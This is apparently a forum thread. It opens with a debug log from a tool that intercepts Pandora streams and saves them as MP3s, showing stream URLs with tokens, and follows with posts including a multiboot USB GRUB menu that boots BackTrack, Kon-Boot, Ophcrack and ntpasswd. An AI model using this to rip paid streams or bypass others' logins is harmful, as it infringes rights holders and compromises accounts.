s2VxQn%2F%2FD0nbN2GTxxa6hVTCE0o%2FyAkm30NAWRwx5KPnSKFgPCVwOLdw7OoHSyryZlrqP%2B11iVOBgY7O%2BoeYNPuWU%2Fansq%2F3059h0%2Fgaug6RkNiS2z6Ej9q8l5ZlqyCzHOT6VZuJYf2QWENiWCps%2BiGZjFVlPRjw7wQOsJMabqVznCCaBKIoym4mlrVv8fP9QSx87hOpUQIBJXOWeR0MYAUs%2BfW6lw%2FiYMUnN565Wqu5Oe%2BLQA0lalJkZbBpOEO%2Bz74FI%3D 12/10/2009 1:29:25 AM Pandora: TURBO Predicting 5 secs for S1139045 (3s est, speed 805.3KBs) 12/10/2009 1:29:25 AM S1139045: Started downloading 12/10/2009 1:29:25 AM StreamPlayer: Data pipe ready 12/10/2009 1:29:25 AM StreamPlayer: Beginning song download 12/10/2009 1:29:25 AM StreamPlayer: Song download complete 12/10/2009 1:29:26 AM StreamPlayer: Pipe connected 12/10/2009 1:29:26 AM StreamPlayer: Starting data transfer 12/10/2009 1:29:26 AM StreamPlayer: Done sending data 12/10/2009 1:29:26 AM Pandora: sniffed Essie Jain - "The Rights" on 'The Inbetween' (ID S1139045) 12/10/2009 1:29:26 AM #295 GET http://images-sjl-t2-2.pandora.com/images/public/amz/0/2/6/5/600197005620_130W_130H.jpg 12/10/2009 1:29:27 AM S1139045: Got album art 12/10/2009 1:29:27 AM Pandora: sniffed Essie Jain - "The Rights" on 'The Inbetween' (ID S1139045) 12/10/2009 1:29:30 AM S1139045: Finished downloading 12/10/2009 1:29:30 AM S1139045: Song AART ready, submitting 12/10/2009 1:29:30 AM Saver2: Processing song Essie Jain - "The Rights" on 'The Inbetween' (ID S1139045) 12/10/2009 1:29:30 AM FILE SAVED, Source: Pandora; MP3 format, 2582150 bytes 12/10/2009 1:29:32 AM PandoraC: Song finished 12/10/2009 1:29:32 AM Saver2: Tagging aac/mp3 file. 12/10/2009 1:29:32 AM PandoraC: Start playing song: The Dresden Dolls - "Lonesome Organist Rapes Page Turner" on 'No, Virgnina' (ID S1134599) 12/10/2009 1:29:32 AM StreamPlayer: Play URL http://audio-sjl-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=peTnY3nH8wcFDQdEEveumM2iOUuFINs5je9oQFeEFXuXExlcfRYVLNpI7vhujLEdoVVnkS s2VxQn%2F%2FD0nbN2GajRIqUGjhIV42B2DWE17fHqI8bzbzXkuleoMbuI1dcvvIEIWhBuLZ1GbHaidfMTj5Q%2BC60A99bJt0VXrQD9XwGdAjykC5T5ZGTMIerHAWZ2GzaIpL%2Bv8ngGEsQuoW5K5%2BFnD0rwTSxeCFpoiELle0YTZ6ojO3Acryr%2BxLvTWM5xt0g%2Fm53DBE6OvZRg5VHQ2dn3gUBuSl7VXNWr2VJQ2MkjJYiaAVqLqgkuqFQD0UppR7IkeBiKN1I%3D 12/10/2009 1:29:33 AM #296 GET http://audio-sjl-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=peTnY3nH8wcFDQdEEveumM2iOUuFINs5je9oQFeEFXuXExlcfRYVLNpI7vhujLEdoVVnkS s2VxQn%2F%2FD0nbN2GajRIqUGjhIV42B2DWE17fHqI8bzbzXkuleoMbuI1dcvvIEIWhBuLZ1GbHaidfMTj5Q%2BC60A99bJt0VXrQD9XwGdAjykC5T5ZGTMIerHAWZ2GzaIpL%2Bv8ngGEsQuoW5K5%2BFnD0rwTSxeCFpoiELle0YTZ6ojO3Acryr%2BxLvTWM5xt0g%2Fm53DBE6OvZRg5VHQ2dn3gUBuSl7VXNWr2VJQ2MkjJYiaAVqLqgkuqFQD0UppR7IkeBiKN1I%3D 12/10/2009 1:29:33 AM Saver2: Tagging completed 12/10/2009 1:29:33 AM Saver2: Processing completed. 12/10/2009 1:29:33 AM Pandora: Adding Essie Jain - The Rights-pandora.mp3 to Punk Rock Favs.m3u 12/10/2009 1:29:33 AM Pandora: TURBO Predicting 5 secs for S1134599 (4s est, speed 811.6KBs) 12/10/2009 1:29:33 AM S1134599: Started downloading 12/10/2009 1:29:33 AM StreamPlayer: Data pipe ready 12/10/2009 1:29:33 AM StreamPlayer: Beginning song download 12/10/2009 1:29:33 AM StreamPlayer: Song download complete 12/10/2009 1:29:33 AM StreamPlayer: Pipe connected 12/10/2009 1:29:34 AM StreamPlayer: Starting data transfer 12/10/2009 1:29:34 AM StreamPlayer: Done sending data 12/10/2009 1:29:34 AM Pandora: sniffed The Dresden Dolls - "Lonesome Organist Rapes Page Turner" on 'No, Virgnina' (ID S1134599) 12/10/2009 1:29:34 AM #297 GET http://images-ash-t2-1.pandora.com/images/public/amz/6/2/6/2/016861792626_130W_130H.jpg 12/10/2009 1:29:37 AM S1134599: Got album art 12/10/2009 1:29:37 AM Pandora: sniffed The Dresden Dolls - "Lonesome Organist Rapes Page Turner" on 'No, Virgnina' (ID S1134599) 12/10/2009 1:29:39 AM S1134599: Finished downloading 12/10/2009 1:29:39 AM S1134599: Song AART ready, submitting 12/10/2009 1:29:39 AM PandoraC: Song finished 12/10/2009 1:29:39 AM Saver2: Processing song The Dresden Dolls - "Lonesome Organist Rapes Page Turner" on 'No, Virgnina' (ID S1134599) 12/10/2009 1:29:39 AM FILE SAVED, Source: Pandora; MP3 format, 3558503 bytes 12/10/2009 1:29:40 AM PandoraC: Start playing song: Yeah Yeah Yeahs - "Y Control" on 'Fever To Tell (Explicit)' (ID S127622) 12/10/2009 1:29:40 AM StreamPlayer: Play URL http://audio-ash-t2-1.pandora.com/access/8500937478590424838?version=4&amp;lid=156635920&amp;token=peTnY3nH8wcFDQdEEveumM2iOUuFINs5je9oQFeEFXuXExlcfRYVLNpI7vhujLEdoVVnkS s2VxQn%2F%2FD0nbN2GSKaor8VN4HX%2Fd5xhP4m7H0jFWsMiA3UWHwEt%2BK1UWavM30Z5KvQeNmEYY3mDVe7eH%2F1IuovK7sQ24hvQb4l3FfWQc7yk5G%2FGM5d6ucB3Jxt9QTM%2BZCt8nLf5WtrnLL0RWzvpbUC6GLlLH4nXI7IcnWgx500WYlPcIuXIjbniNnyfTFrwxNlxsJMFKG9i0E JCzZh4L6anutNr9arO8mPXeDjki2khSsrzJ0dYY7GGFqY0GdhGlN0WWg%3D 12/10/2009 1:29:40 AM #298 GET http://audio-ash-t2-1.pandora.com/access/8500937478590424838?version=4&amp;lid=156635920&amp;token=peTnY3nH8wcFDQdEEveumM2iOUuFINs5je9oQFeEFXuXExlcfRYVLNpI7vhujLEdoVVnkS s2VxQn%2F%2FD0nbN2GSKaor8VN4HX%2Fd5xhP4m7H0jFWsMiA3UWHwEt%2BK1UWavM30Z5KvQeNmEYY3mDVe7eH%2F1IuovK7sQ24hvQb4l3FfWQc7yk5G%2FGM5d6ucB3Jxt9QTM%2BZCt8nLf5WtrnLL0RWzvpbUC6GLlLH4nXI7IcnWgx500WYlPcIuXIjbniNnyfTFrwxNlxsJMFKG9i0E JCzZh4L6anutNr9arO8mPXeDjki2khSsrzJ0dYY7GGFqY0GdhGlN0WWg%3D 12/10/2009 1:29:41 AM Saver2: Tagging aac/mp3 file. 12/10/2009 1:29:42 AM Saver2: Tagging completed 12/10/2009 1:29:42 AM Saver2: Processing completed. 12/10/2009 1:29:42 AM Pandora: Adding The Dresden Dolls - Lonesome Organist Rapes Page Turner-pandora.mp3 to Punk Rock Favs.m3u 12/10/2009 1:29:42 AM Pandora: TURBO Predicting 5 secs for S127622 (5s est, speed 687.2KBs) 12/10/2009 1:29:42 AM S127622: Started downloading 12/10/2009 1:29:42 AM StreamPlayer: Data pipe ready 12/10/2009 1:29:42 AM StreamPlayer: Beginning song download 12/10/2009 1:29:42 AM StreamPlayer: Song download complete 12/10/2009 1:29:42 AM StreamPlayer: Pipe connected 12/10/2009 1:29:43 AM StreamPlayer: Starting data transfer 12/10/2009 1:29:43 AM StreamPlayer: Done sending data 12/10/2009 1:29:43 AM Pandora: sniffed Yeah Yeah Yeahs - "Y Control" on 'Fever To Tell (Explicit)' (ID S127622) 12/10/2009 1:29:43 AM #299 GET http://images-sjl-t2-2.pandora.com/images/public/amz/2/2/0/8/600445098022_130W_130H.jpg 12/10/2009 1:29:47 AM S127622: Got album art 12/10/2009 1:29:47 AM Pandora: sniffed Yeah Yeah Yeahs - "Y Control" on 'Fever To Tell (Explicit)' (ID S127622) 12/10/2009 1:29:48 AM PandoraC: Song finished 12/10/2009 1:29:48 AM S127622: Finished downloading 12/10/2009 1:29:48 AM S127622: Song AART ready, submitting 12/10/2009 1:29:49 AM PandoraC: Start playing song: Kate Nash - "Habanera" on 'Foundations Ep (Explicit)' (ID S979485) 12/10/2009 1:29:49 AM Saver2: Processing song Yeah Yeah Yeahs - "Y Control" on 'Fever To Tell (Explicit)' (ID S127622) 12/10/2009 1:29:49 AM FILE SAVED, Source: Pandora; MP3 format, 3852328 bytes 12/10/2009 1:29:49 AM StreamPlayer: Play URL http://audio-sjl-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=peTnY3nH8wcFDQdEEveumM2iOUuFINs5je9oQFeEFXuXExlcfRYVLNpI7vhujLEdoVVnkS s2VxQn%2F%2FD0nbN2GUIAzYKs6AKmDthcfBkqE9GgjhWyeIa7ZSi58wNbcJopqk%2BbbPLFWMX0D9%2FvSMZQLjkdNpPJspO9Tk%2FfUa%2FNq7TjKO0QvY%2F%2BEsOutSum3vqA3maLcxpVjwlINsuCHbBWOBQEroF%2B1NXMxgcuO4BXsJGmQzFNOf02W7jtC2WnnaCZQlfnTCUXFKddrFTeUOzaNfp7uTJMneL3NkHSQInCG2 PDR8aWFt3VPcVy4zddZZ8GMMrmavKLT4c%3D 12/10/2009 1:29:49 AM #300 GET http://audio-sjl-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=peTnY3nH8wcFDQdEEveumM2iOUuFINs5je9oQFeEFXuXExlcfRYVLNpI7vhujLEdoVVnkS s2VxQn%2F%2FD0nbN2GUIAzYKs6AKmDthcfBkqE9GgjhWyeIa7ZSi58wNbcJopqk%2BbbPLFWMX0D9%2FvSMZQLjkdNpPJspO9Tk%2FfUa%2FNq7TjKO0QvY%2F%2BEsOutSum3vqA3maLcxpVjwlINsuCHbBWOBQEroF%2B1NXMxgcuO4BXsJGmQzFNOf02W7jtC2WnnaCZQlfnTCUXFKddrFTeUOzaNfp7uTJMneL3NkHSQInCG2 PDR8aWFt3VPcVy4zddZZ8GMMrmavKLT4c%3D 12/10/2009 1:29:51 AM Saver2: Tagging aac/mp3 file. 12/10/2009 1:29:52 AM Saver2: Tagging completed 12/10/2009 1:29:52 AM Saver2: Processing completed. 12/10/2009 1:29:52 AM Pandora: Adding Yeah Yeah Yeahs - Y Control-pandora.mp3 to Punk Rock Favs.m3u 12/10/2009 1:29:52 AM Pandora: TURBO Predicting 5 secs for S979485 (3s est, speed 650.8KBs) 12/10/2009 1:29:52 AM S979485: Started downloading 12/10/2009 1:29:52 AM StreamPlayer: Data pipe ready 12/10/2009 1:29:52 AM StreamPlayer: Beginning song download 12/10/2009 1:29:52 AM StreamPlayer: Song download complete 12/10/2009 1:29:52 AM StreamPlayer: Pipe connected 12/10/2009 1:29:53 AM StreamPlayer: Starting data transfer 12/10/2009 1:29:53 AM StreamPlayer: Done sending data 12/10/2009 1:29:53 AM Pandora: sniffed Kate Nash - "Habanera" on 'Foundations Ep (Explicit)' (ID S979485) 12/10/2009 1:29:53 AM #301 GET http://images-ash-t2-1.pandora.com/images/public/amz/5/4/6/3/602517473645_130W_130H.jpg 12/10/2009 1:29:54 AM S979485: Got album art 12/10/2009 1:29:54 AM Pandora: sniffed Kate Nash - "Habanera" on 'Foundations Ep (Explicit)' (ID S979485) 12/10/2009 1:29:56 AM S979485: Finished downloading 12/10/2009 1:29:56 AM S979485: Song AART ready, submitting 12/10/2009 1:29:56 AM Saver2: Processing song Kate Nash - "Habanera" on 'Foundations Ep (Explicit)' (ID S979485) 12/10/2009 1:29:57 AM FILE SAVED, Source: Pandora; MP3 format, 2310895 bytes 12/10/2009 1:29:58 AM PandoraC: Song finished 12/10/2009 1:29:58 AM Saver2: Tagging aac/mp3 file. 12/10/2009 1:29:59 AM Saver2: Tagging completed 12/10/2009 1:29:59 AM Saver2: Processing completed. 12/10/2009 1:29:59 AM Pandora: Adding Kate Nash - Habanera-pandora.mp3 to Punk Rock Favs.m3u 12/10/2009 1:29:59 AM PandoraC: Fetching playlist... 12/10/2009 1:29:59 AM #302 POST http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;lid=156635920&amp;method=getFragment&amp;arg1=164980723472012048&amp;arg2=0&amp;arg3=&amp;arg4=&amp;arg5=mp3%2Dhifi&amp;arg6=0&amp;arg7=0 12/10/2009 1:29:59 AM #302 POST 1200 bytes to www.pandora.com 12/10/2009 1:30:00 AM Pandora: Inspecting XMLRPC 'getFragment': http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;lid=156635920&amp;method=getFragment&amp;arg1=164980723472012048&amp;arg2=0&amp;arg3=&amp;arg4=&amp;arg5=mp3%2Dhifi&amp;arg6=0&amp;arg7=0 12/10/2009 1:30:00 AM Pandora: Data format: mp3 12/10/2009 1:30:00 AM Pandora: Got song S937159, URL = http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=52Q4brSYXbR1Ca2BFWhGBYRLoumZfrdbHRU4yUii7SwNztJ3VSUIsNMkEWtRhe8k8rJ7Wm lkkAJhClOtGlO1DJqSTOvIquM9rfcO8E2XQzkOLUWHBEtVPSYWjoxCONNcUzrnx921NBIQ7juGc3n%2F4YpFCHUWaG4oKmmjpd8KHEVXAaeq6i0FeyCbdXE%2FKSSp8ih1G9eIfnY3uSgLEw4bf6unRIgtCZPacOSUUXotMue%2BdY9teSAYW1esUvf08LSon79QS4ap7HQc35nMyLz4DQWAZur%2FKNN8oYXw5eFy3g3Y%2FbbkGJPzy6JB4pfTa01FLrDTFOELqsg%3D 12/10/2009 1:30:00 AM Pandora: Got song S931310, URL = http://audio-sjl-t3-1.pandora.com/access/6993596049802139386?version=4&amp;lid=156635920&amp;token=52Q4brSYXbR1Ca2BFWhGBYRLoumZfrdbHRU4yUii7SwNztJ3VSUIsNMkEWtRhe8k8rJ7Wm lkkAJhClOtGlO1DFljiXnBAoEtIAiIGDuRbFlNl9%2B75iag0mXVTDEjfOra%2FFg6ahMjYm3loO8aqCCMkEj4udKEkpcVq6aFkd6f218bz%2Fg0ubHLVhcbZdgP0KkiGhF0NRXuhKOWjaIN2XgE9gTECeap4jBtkrLzGCqkRCP62C8L1yXJtW1%2BfccXS6JBAHDtLc1DrBZqW5wWNA%2F5Gje6bRkNeAtjfSKKk4oFEaI7UW%2FpOGqhfFt9Wif%2FK63Vf3dP0xOg5bw%3D 12/10/2009 1:30:00 AM Pandora: Got song S255975, URL = http://audio-sjl-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=52Q4brSYXbR1Ca2BFWhGBYRLoumZfrdbHRU4yUii7SwNztJ3VSUIsNMkEWtRhe8k8rJ7Wm lkkAJhClOtGlO1DA9zrS80wb2wIzavC38IZRAF8053gk1qN7r%2F%2FBHnpsJ%2B7GeCVMYW3pWQ5Fkn4R5%2FVKIaSbmIkpOC1%2BkUZR%2F3L%2BddrApa48v77O7k%2FoqxFP0rxnpEBUk%2FQiBiQVu0GnChh3CxocVG0q5FgKyb4%2Fu0YgNkP3uP0dVPIbQyjGl4BWlsycsbXbGoLyBPCc3oB2Y3vijd68uF1Mux5e9gBuuIN%2FRP2Pl4SPFECV31LBTHlNcOZEAwfpHnAm8%3D 12/10/2009 1:30:00 AM Pandora: Got song S209194, URL = http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=52Q4brSYXbR1Ca2BFWhGBYRLoumZfrdbHRU4yUii7SwNztJ3VSUIsNMkEWtRhe8k8rJ7Wm lkkAJhClOtGlO1DF%2F9imXjMbSx8OOfsK1XELiW%2FUI0uVPUkM9QqtXJXxlp%2B7KOl2JSzXhVGB0WPjAQIjFyHOgUPBuixwxs3N3zj%2FwmK7Usek59kNKoxllqM4wSQowyeA0bwYlTIBp03EF14dgJpDbcXXd2AAfRhmt3GGdHlgwn8qcqysuN g0ipaMVxYPfRI4p%2FrLuoyhkbDYenJ7KzoKiDOQp1u%2BR1R3ylJfHn4uW4gL4q6WwnsoazlItpX5opct%2F9Ros%3D 12/10/2009 1:30:00 AM PandoraC: Start playing song: Bad Religion - "Requiem For Dissent" on 'New Maps Of Hell' (ID S937159) 12/10/2009 1:30:01 AM StreamPlayer: Play URL http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=52Q4brSYXbR1Ca2BFWhGBYRLoumZfrdbHRU4yUii7SwNztJ3VSUIsNMkEWtRhe8k8rJ7Wm lkkAJhClOtGlO1DJqSTOvIquM9rfcO8E2XQzkOLUWHBEtVPSYWjoxCONNcUzrnx921NBIQ7juGc3n%2F4YpFCHUWaG4oKmmjpd8KHEVXAaeq6i0FeyCbdXE%2FKSSp8ih1G9eIfnY3uSgLEw4bf6unRIgtCZPacOSUUXotMue%2BdY9teSAYW1esUvf08LSon79QS4ap7HQc35nMyLz4DQWAZur%2FKNN8oYXw5eFy3g3Y%2FbbkGJPzy6JB4pfTa01FLrDTFOELqsg%3D 12/10/2009 1:30:01 AM #303 GET http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=52Q4brSYXbR1Ca2BFWhGBYRLoumZfrdbHRU4yUii7SwNztJ3VSUIsNMkEWtRhe8k8rJ7Wm lkkAJhClOtGlO1DJqSTOvIquM9rfcO8E2XQzkOLUWHBEtVPSYWjoxCONNcUzrnx921NBIQ7juGc3n%2F4YpFCHUWaG4oKmmjpd8KHEVXAaeq6i0FeyCbdXE%2FKSSp8ih1G9eIfnY3uSgLEw4bf6unRIgtCZPacOSUUXotMue%2BdY9teSAYW1esUvf08LSon79QS4ap7HQc35nMyLz4DQWAZur%2FKNN8oYXw5eFy3g3Y%2FbbkGJPzy6JB4pfTa01FLrDTFOELqsg%3D 12/10/2009 1:30:01 AM Plugin error while pre-tampering: System.IO.IOException System.IO.IOException: There are no more files. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.Directory.InternalGetFileDirectoryNames(String path, String userPathOriginal, String searchPattern, Boolean includeFiles, Boolean includeDirs, SearchOption searchOption) at System.IO.Directory.GetFiles(String path, String searchPattern, SearchOption searchOption) at System.IO.Directory.GetFiles(String path, String searchPattern) at Saver2.SongInfo.Prepare(Int64 length) in E:\Codin' Projects\Saver Project\Saver2\SongInfo.cs:line 199 at Pandora.PandoraS.TamperBefore(Session oSession, ProxyHandlingMode&amp; m) in E:\Codin' Projects\Saver Project\Pandora\Pandora.Saver.cs:line 223 at SaverPlugin.TamperResponseBefore(Session s, ProxyHandlingMode&amp; mode) in E:\Codin' Projects\Saver Project\Saver2\SaverPlugin.cs:line 154 at Proxy.PluginMgr.TamperBefore(Session sess, ProxyHandlingMode&amp; mode) in E:\Codin' Projects\Saver Project\SProxy\PluginMgr.cs:line 74 12/10/2009 1:30:31 AM StreamPlayer: Exception while starting --&gt; System.Exception: HTTP streaming failure ---&gt; System.Net.WebException: The operation has timed out at System.Net.HttpWebRequest.GetResponse() at Pandora.StreamPlayer.Play(String URL) in E:\Codin' Projects\Saver Project\Pandora\StreamPlayer.cs:line 231 --- End of inner exception stack trace --- at Pandora.StreamPlayer.Play(String URL) in E:\Codin' Projects\Saver Project\Pandora\StreamPlayer.cs:line 236 12/10/2009 1:30:31 AM PandoraC: Failed to play song, trying again 12/10/2009 1:30:31 AM PandoraC: Start playing song: The Broken Toys - "Buttered Up" on 'Fistful Of Caulk' (ID S931310) 12/10/2009 1:30:32 AM StreamPlayer: Play URL http://audio-sjl-t3-1.pandora.com/access/6993596049802139386?version=4&amp;lid=156635920&amp;token=52Q4brSYXbR1Ca2BFWhGBYRLoumZfrdbHRU4yUii7SwNztJ3VSUIsNMkEWtRhe8k8rJ7Wm lkkAJhClOtGlO1DFljiXnBAoEtIAiIGDuRbFlNl9%2B75iag0mXVTDEjfOra%2FFg6ahMjYm3loO8aqCCMkEj4udKEkpcVq6aFkd6f218bz%2Fg0ubHLVhcbZdgP0KkiGhF0NRXuhKOWjaIN2XgE9gTECeap4jBtkrLzGCqkRCP62C8L1yXJtW1%2BfccXS6JBAHDtLc1DrBZqW5wWNA%2F5Gje6bRkNeAtjfSKKk4oFEaI7UW%2FpOGqhfFt9Wif%2FK63Vf3dP0xOg5bw%3D 12/10/2009 1:30:32 AM #304 GET http://audio-sjl-t3-1.pandora.com/access/6993596049802139386?version=4&amp;lid=156635920&amp;token=52Q4brSYXbR1Ca2BFWhGBYRLoumZfrdbHRU4yUii7SwNztJ3VSUIsNMkEWtRhe8k8rJ7Wm lkkAJhClOtGlO1DFljiXnBAoEtIAiIGDuRbFlNl9%2B75iag0mXVTDEjfOra%2FFg6ahMjYm3loO8aqCCMkEj4udKEkpcVq6aFkd6f218bz%2Fg0ubHLVhcbZdgP0KkiGhF0NRXuhKOWjaIN2XgE9gTECeap4jBtkrLzGCqkRCP62C8L1yXJtW1%2BfccXS6JBAHDtLc1DrBZqW5wWNA%2F5Gje6bRkNeAtjfSKKk4oFEaI7UW%2FpOGqhfFt9Wif%2FK63Vf3dP0xOg5bw%3D 12/10/2009 1:30:32 AM S931310: Started downloading 12/10/2009 1:30:32 AM StreamPlayer: Data pipe ready 12/10/2009 1:30:32 AM StreamPlayer: Beginning song download 12/10/2009 1:30:33 AM StreamPlayer: Pipe connected 12/10/2009 1:30:33 AM StreamPlayer: Starting data transfer 12/10/2009 1:30:33 AM Pandora: sniffed The Broken Toys - "Buttered Up" on 'Fistful Of Caulk' (ID S931310) 12/10/2009 1:30:34 AM #305 GET http://images-ash-t2-1.pandora.com/images/public/amg/5/2/0/0/620673230025_130W_130H.jpg 12/10/2009 1:30:38 AM StreamPlayer: Song download complete 12/10/2009 1:30:38 AM S931310: Finished downloading 12/10/2009 1:30:38 AM S931310: Waiting for AART... 12/10/2009 1:31:37 AM #306 GET /log Thanks for the wonderful app. If I could afford to I'd donate. Also checkout github when you decide it's ready for opensourcing.
  9. You can translate the syslinux or isolinux entries from the trk disc into grub and put them in your menu.lst or a submenu.lst. That's it unless you put trk on it's own partion. Just a hint on the translation everything after the kernel name or initrd name on the same line are usually arguments for the kernel or initrd and not syslinux or isolinux commands. That tripped me up when i did this for my first multiboot usb (premultipass).
  10. That is my intention now. I've created a github repo, which currently just has the base tarball from you at the moment. If anyone wants to check it out at any point the link is http://github.com/haxwithaxe/Karma4Fon/tree/master
  11. @orange: Did you do anything special to get mmc over gpio to work?
  12. Whenever possible try to work with the package management system on whatever system you're working on not against it. You might even go so far as to add the xwrt repo to the /etc/opkg.conf (i think that's where those live). that way you can just use "opkg update && opkg install <package name>" to get what you want and it won't cause crazy errors.
  13. Smart Boot Manager, BT3, BT4 pre(load to menu.lst), Kon-Boot, Ophcrack, Trinity Rescue Kit(on other partition), Hirens 9.9, ntpasswd, DBAN, Parted Magic, FreeDOS, Damn Small Linux, Ubuntu LiveCD(non-persistent), Super Grub Disk(made using unetbootin), Memory Test, Boot the First Hard Disk menu.lst: title Smart Boot Manager kernel /memdisk initrd /sbm.img title BT3 kernel /bt3_root/boot/vmlinuz vga=0x317 ramdisk_size=6666 root=/dev/ram0 rw quiet initrd=/bt3_root/boot/initrd.gz title BT4 pre configfile /bt4-pre_root/boot/grub/menu.lst title Kon-Boot map --mem /konboot-1.1.img (fd0) map --hook chainloader (fd0)+1 map (hd1) (hd0) map --hook rootnoverify (fd0) title Ophcrack kernel /ophcrack_root/boot/bzImage rw root=/dev/null vga=normal lang=C kmap=us screen=1024x768x16 autologin initrd /ophcrack_root/boot/rootfs.gz title Trinity Rescue Kit map (hd0,1)+1 (fd0) map --hook rootnoverify (fd0) chainloader +1 title Hirens 9.9 kernel /memdisk initrd /hirens_root/boot.gz title ntpasswd kernel /memdisk initrd /ntpasswd.img title DBAN kernel /memdisk initrd /dban-floppy.img title Parted Magic kernel /pmagic/bzImage noapic load_ramdisk=1 prompt_ramdisk=0 rw vga=791 sleep=10 loglevel=0 keymap=us initrd /pmagic/initramfs title FreeDOS kernel /memdisk initrd /freedos.img title Damn Small Linux kernel /dsl_root/boot/isolinux/linux24 ramdisk_size=100000 init=/etc/init lang=us apm=power-off vga=789 initrd=minirt24.gz nomce noapic BOOT_IMAGE=dsl initrd /dsl_root/boot/isolinux/minirt24.gz title Ubuntu LiveCD find --set-root /ubuntu904.iso map /ubuntu904.iso (0xff) map --hook rootnoverify (0xff) kernel /casper/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper iso-scan/filename=/ubuntu904.iso quiet splash locale=en.UTF-8 -- initrd /casper/initrd.gz title Super Grub Disk(made using unetbootin) kernel /super-grub_root/ubnkern initrd /super-grub_root/ubninit title Memory Test kernel /memtest86+.bin title Boot the First Hard Disk rootnoverify (hd1) chainloader +1 ##END################ boot BT4pre menu.lst: # By default, boot the first entry. default 0 # Boot automatically after 30 secs. timeout 30 splashimage=/bt4-pre_root/boot/grub/bt4.xpm.gz title Start BackTrack FrameBuffer (1024x768) kernel /bt4-pre_root/boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x317 initrd /bt4-pre_root/boot/initrd.gz title Start BackTrack FrameBuffer (800x600) kernel /bt4-pre_root/boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x314 initrd /bt4-pre_root/boot/initrd800.gz title Start BackTrack Forensics (no swap) kernel /bt4-pre_root/boot/vmlinuz BOOT=casper boot=casper nopersistent rw vga=0x317 initrd /bt4-pre_root/boot/initrdfr.gz title Start BackTrack in Safe Graphical Mode kernel /bt4-pre_root/boot/vmlinuz BOOT=casper boot=casper xforcevesa rw quiet initrd /bt4-pre_root/boot/initrd.gz title Start Persistent Live CD kernel /bt4-pre_root/boot/vmlinuz BOOT=casper boot=casper persistent rw quiet initrd /bt4-pre_root/boot/initrd.gz title Start BackTrack in Text Mode kernel /bt4-pre_root/boot/vmlinuz BOOT=casper boot=casper nopersistent textonly rw quiet initrd /bt4-pre_root/boot/initrd.gz title Start BackTrack Graphical Mode from RAM kernel /bt4-pre_root/boot/vmlinuz BOOT=casper boot=casper toram nopersistent rw quiet initrd /bt4-pre_root/boot/initrd.gz title Memory Test kernel /bt4-pre_root/boot/memtest86+.bin title Boot the First Hard Disk root (hd0) chainloader +1 tree of usb root user@host:/media/BOOTDISCS$ tree . |-- BT3 | |-- LICENSE | |-- base | | |-- bin.lzm | | |-- changes.lzm | | |-- etc.lzm | | |-- home.lzm | | |-- kernel.lzm | | |-- lib.lzm | | |-- opt.lzm | | |-- pentest.lzm | | |-- root.lzm | | |-- sbin.lzm | | |-- usr.lzm | | `-- var.lzm | |-- livecd.sgn | |-- make_iso.bat | |-- make_iso.sh | |-- modules | | |-- ccsm-0.7.4-noarch-1as.lzm | | |-- compiz-0.7.4-i486-1sl.lzm | | |-- compiz-bcop-0.7.4-noarch-1as.lzm | | |-- compiz-fusion-plugins-extra-0.7.4-i486-1as.lzm | | |-- compiz-fusion-plugins-main-0.7.4-i486-1as.lzm | | |-- compiz-fusion-plugins-unsupported-0.7.4-i486-1as.lzm | | |-- compizconfig-backend-kconfig-0.7.4-i486-1as.lzm | | |-- compizconfig-python-0.7.4-i486-1as.lzm | | |-- emerald-0.7.4-i486-1as.lzm | | |-- emerald-themes-0.6.99-i486-1bmg.lzm | | |-- fuse-2.7.3-i486-1as.lzm | | |-- fusion-icon-20080312-noarch-1as.lzm | | |-- libcompizconfig-0.7.4-i486-1as.lzm | | |-- libsexy-0.1.11-i686-4as.lzm | | |-- libwnck-2.18.3-i486-1sl.lzm | | |-- mesa.lzm | | |-- pycairo-1.4.12-i686-1as.lzm | | |-- pygobject-2.14.1-i486-1sl.lzm | | |-- pygtk-2.12.1-i486-1sl.lzm | | |-- pyrex- | | `-- sexy-python-0.1.9-i686-4as.lzm | |-- optional | | |-- cubez.lzm | | `-- nvidiadriver.lzm | `-- tools | |-- WIN | | |-- config | | |-- cygwin1.dll | | `-- mkisofs.exe | |-- deb2lzm | |-- dir2lzm | |-- liblinuxlive | |-- lzm2dir | |-- mksquashfs | |-- rmlivemod | |-- tgz2lzm | |-- unsquashfs | `-- uselivemod |-- KNOPPIX | `-- KNOPPIX |-- bt3_root | `-- boot | |-- bootinst.bat | |-- bootinst.sh | |-- bootlilo.sh | |-- chain.c32 | |-- dos | | |-- BT3.bat | | |-- config | | |-- loadlin.exe | | `-- readme.txt | |-- initrd.gz | |-- isolinux | | |-- isolinux.bin | | |-- isolinux.boot | | `-- isolinux.cfg | |-- msramdmp.c32 | |-- mt86p | |-- syslinux | | |-- ldlinux.sys | | |-- lilo | | |-- mbr.bin | | |-- syslinux | | |-- syslinux.cfg | | |-- syslinux.com | | `-- syslinux.exe | |-- vesamenu.c32 | `-- vmlinuz |-- bt4-pre_root | |-- boot | | |-- bootsplash | | |-- grub | | | |-- bt4.xpm.gz | | | |-- menu.lst | | | `-- stage2_eltorito | | |-- initrd.gz | | |-- initrd800.gz | | |-- initrdfr.gz | | |-- memtest86+.bin | | `-- vmlinuz | |-- boot.catalog | `-- md5sum.txt |-- casper | |-- filesystem.manifest | |-- filesystem.manifest-desktop | `-- filesystem.squashfs |-- clonezilla_root | |-- COPYING | |-- Clonezilla-Live-Version | |-- home | | `-- partimag | |-- live | | |-- eb.zli | | |-- filesystem.squashfs | | |-- freedos.img | | |-- gpxe.lkn | | |-- initrd1.img | | |-- memtest | | |-- packages.txt | | |-- parameters.txt | | `-- vmlinuz1 | |-- syslinux | | |-- chain.c32 | | |-- drblwp.png 